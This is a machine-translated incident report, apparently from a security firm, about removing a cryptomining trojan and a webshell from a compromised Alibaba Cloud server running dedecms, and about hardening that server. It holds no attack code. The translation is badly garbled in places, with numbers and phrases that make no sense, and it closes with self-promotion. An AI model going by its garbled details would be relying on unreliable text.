Alicloud ECS Server is currently used by many website customers , You can use different systems in the server ,windows2008
windows2012,linux All systems can be used in Alibaba cloud server , Some time ago, we SINE Receive the customer's help safely , Said to have received a text message reminder from Alibaba cloud , Remind the server of mining process , Please handle the security alert immediately . The customer website cannot be opened normally , Connecting the card to the server SSH No remote connection , It has a great impact on customers .

And then we SINE The security engineer carries on the comprehensive security inspection to the client's server , Log in to alicloud's control platform , Remote access via local , Discovery client server CPU Up to 100% 100, Checked the server's CPU Monitoring records , It's usually at 100% 20-35 Floating between , We TOP View process , Track and see which processes are in use CPU, It is found that , There's a process that's been occupying , Problems from above , It can be judged that the client's server is implanted with a mining program , The server was hacked , Lead to the mining process of alicloud security warning .

It turned out that the client's server in the mining Trojan horse , Let's take a look top Screenshot of the process :

Our understanding of the occupancy process ID, Find out , The file was found in linux Systematic tmp Under the directory , We forced the deletion of the file , And use the command to delete the process to delete the process ,CPU It's down to 100 percent in an instant 10, This is the root of mining , So how do hackers attack servers , Implanted mining Trojan program ? Through us SINE Safety experience of many years , The customer's website may have been tampered with , We immediately launched a comprehensive security testing of customer websites , Customers use dedecms Station building system , GPl php+mysql Database architecture , For all the code and pictures , The database is tested for security , Sure enough, we found the problem , The root directory of the website has been uploaded webshell Trojan file , Consulted the customer , The customer said that he had received a reply from Alibaba cloud before webshell Back door reminder , The customer didn't care .

This time the server was implanted mining Trojan root of the vulnerability is the existence of vulnerability site , We are right dedecms The code vulnerability of is repaired manually , Include remote code execution vulnerabilities that existed before the code , as well as sql The injection vulnerability has been fully repaired , The folder permissions of the website are deployed safely , default dede The back office helped the customer to make changes , And increase the secondary password protection of the website background .

Clear the back door of Trojan horse , In the timing task of the server , A task plan added by the attacker was found , Each server restart and interval 1 hour , Automatic mining Trojan horse , Delete the scheduled task plan , Yes linux System users , Whether to add other root Level administrator users , No addition found . View the server's backlinks , Including malicious ports, is there anything else IP link ,netstat
-an All ports are checked for security , Found no implanted remote Trojan backdoor , The client's port security is deployed , use iptables To limit the inflow and outflow of ports .

So far, the problem of mining trojan in the client server can be completely solved , Protection and solution of Trojan horse in mining , To sum up

what time? :

Regularly check the security of website code , Check if there is any webshell back door , Regularly upgrade the system version of the website and fix the vulnerability , The backstage login of the website is used for the second password verification , Prevent the existence of websites sql Injection vulnerability , The administrator account and password are obtained , So as to log in the background . Using alicloud's port security policy , yes 80 port , as well as 443 Open the port , The rest SSH Port IP Release , When you need to log in to the server, go to the Alibaba cloud background to add the release IP, As far as possible to prevent the server from being malicious login , If you also encounter a mining program prompted by alicloud on the server , You can find a professional server security company to deal with it , In China, too SINESAFE, Green League , Enlightening stars , It's better to wait for security companies , Also hope that we can solve the problem in the process , Can help more people .

Technology